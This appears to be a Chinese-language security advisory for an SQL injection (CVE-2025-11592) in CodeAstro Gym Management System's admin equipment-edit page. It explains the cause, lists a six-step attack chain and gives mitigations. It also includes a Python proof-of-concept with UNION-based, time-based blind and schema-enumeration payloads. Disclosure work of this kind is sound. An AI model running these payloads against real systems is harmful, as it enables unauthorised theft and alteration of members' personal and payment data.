CVE-2025-11592：CodeAstro健身房管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11592

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Gym Management System

漏洞概述

CVE-2025-11592是CodeAstro Gym Management System 1.0版本中存在的一个SQL注入漏洞。该漏洞位于管理后台的/admin/edit-equipmentform.php文件中，攻击者可以通过操纵参数ID实现SQL注入攻击。该漏洞的CVSS 3.1评分为6.3，属于中危级别。该漏洞可以被远程利用，攻击者只需要具备低权限（已认证的管理员账户）即可发起攻击，无需用户交互。攻击成功后，攻击者可以读取、修改或删除数据库中的敏感数据，对系统的机密性、完整性和可用性均造成低级别的影响。目前该漏洞的利用方式已经公开披露，可能被恶意攻击者利用。CodeAstro Gym Management System是一款用于健身房管理的Web应用程序，包含会员管理、设备管理、课程预约等功能。由于其管理后台涉及大量敏感数据，SQL注入漏洞可能导致用户个人信息、支付记录等敏感数据泄露。鉴于漏洞利用代码已经公开，建议相关用户尽快采取防护措施。

技术细节

该漏洞的根本原因在于/admin/edit-equipmentform.php文件中对用户输入的ID参数未进行充分的过滤和参数化处理。具体而言，当管理员访问设备编辑页面时，系统会根据传入的ID参数从数据库中查询相应的设备信息。然而，由于代码直接将用户可控的ID参数拼接到SQL查询语句中，攻击者可以通过构造恶意的SQL语句片段注入到查询中。攻击者可以使用UNION SELECT等SQL注入技术，从数据库中提取任意数据，或者使用UPDATE、DELETE等语句修改或删除数据。例如，攻击者可以构造如下Payload：

GET /admin/edit-equipmentform.php?id=1' UNION SELECT 1,user(),database(),4,5-- -

由于攻击需要低权限认证（PR:L），攻击者首先需要获取管理员账户凭证，或者利用其他途径获取有效的会话。一旦认证通过，即可通过构造恶意ID参数触发SQL注入漏洞。该漏洞的利用复杂度较低（AC:L），不需要特殊的环境条件即可成功利用。

攻击链分析

STEP 1

步骤1：获取认证凭据

攻击者首先需要获取有效的管理员账户凭证，可以通过社会工程学、暴力破解或利用其他已知漏洞获取低权限管理账户。

STEP 2

步骤2：登录管理后台

使用获取的管理员凭据登录到CodeAstro Gym Management System的管理后台，获取有效的会话Cookie。

STEP 3

步骤3：构造恶意Payload

针对/admin/edit-equipmentform.php文件的ID参数，构造SQL注入Payload，如UNION SELECT注入或基于时间的盲注。

STEP 4

步骤4：发送恶意请求

将构造好的Payload作为ID参数值发送到目标服务器，触发SQL注入漏洞。

STEP 5

步骤5：提取敏感数据

通过SQL注入从数据库中提取敏感信息，包括用户凭证、个人信息、支付记录等。

STEP 6

步骤6：数据篡改或破坏

利用SQL注入执行UPDATE或DELETE语句，篡改或删除数据库中的关键数据，影响系统正常运行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11592 PoC - SQL Injection in CodeAstro Gym Management System
# Vulnerable file: /admin/edit-equipmentform.php
# Vulnerable parameter: ID

import requests

# Target configuration
TARGET_URL = "http://target.com"
ADMIN_PATH = "/admin/edit-equipmentform.php"
USERNAME = "admin"
PASSWORD = "password"

# Create a session to maintain cookies
session = requests.Session()

# Step 1: Login as admin (low privilege required)
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "login": "submit"
}
login_url = f"{TARGET_URL}/admin/"
session.post(login_url, data=login_data)

# Step 2: Exploit SQL Injection via ID parameter
# Payload to extract database version
sqli_payload = "1' UNION SELECT 1,version(),database(),user(),5-- -"
inject_url = f"{TARGET_URL}{ADMIN_PATH}?id={sqli_payload}"

response = session.get(inject_url)
print(f"Status Code: {response.status_code}")
print(f"Response Length: {len(response.text)}")

# Step 3: Extract sensitive data using boolean-based or time-based techniques
# Time-based blind SQLi payload
time_payload = "1' AND SLEEP(5)-- -"
time_url = f"{TARGET_URL}{ADMIN_PATH}?id={time_payload}"

import time
start_time = time.time()
response = session.get(time_url)
elapsed_time = time.time() - start_time
print(f"Time elapsed: {elapsed_time:.2f} seconds")
if elapsed_time > 4:
    print("[+] SQL Injection confirmed via time-based technique")

# Step 4: Extract database information
info_payload = "1' UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()-- -"
info_url = f"{TARGET_URL}{ADMIN_PATH}?id={info_payload}"
response = session.get(info_url)
print(f"Database tables info: {response.text[:500]}")

影响范围

CodeAstro Gym Management System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制/admin/edit-equipmentform.php文件的访问权限，仅允许特定IP地址访问；2）部署Web应用防火墙（WAF）规则，阻止包含SQL关键字和特殊字符的请求；3）对ID参数进行严格的输入验证，确保其为整数类型；4）监控数据库日志，及时发现异常的SQL查询行为；5）定期更换管理员密码，避免凭据泄露；6）启用多因素认证，提高账户安全性。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11592
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11592
3 Details https://www.cvedetails.com/cve/CVE-2025-11592/
4 VulDB https://vuldb.com/cve/CVE-2025-11592
5 Link https://codeastro.com/
6 Link https://github.com/coppeliaz/cve/issues/5
7 Link https://vuldb.com/?ctiid.327913
8 Link https://vuldb.com/?id.327913
9 Link https://vuldb.com/?submit.671740
10 Link https://github.com/coppeliaz/cve/issues/5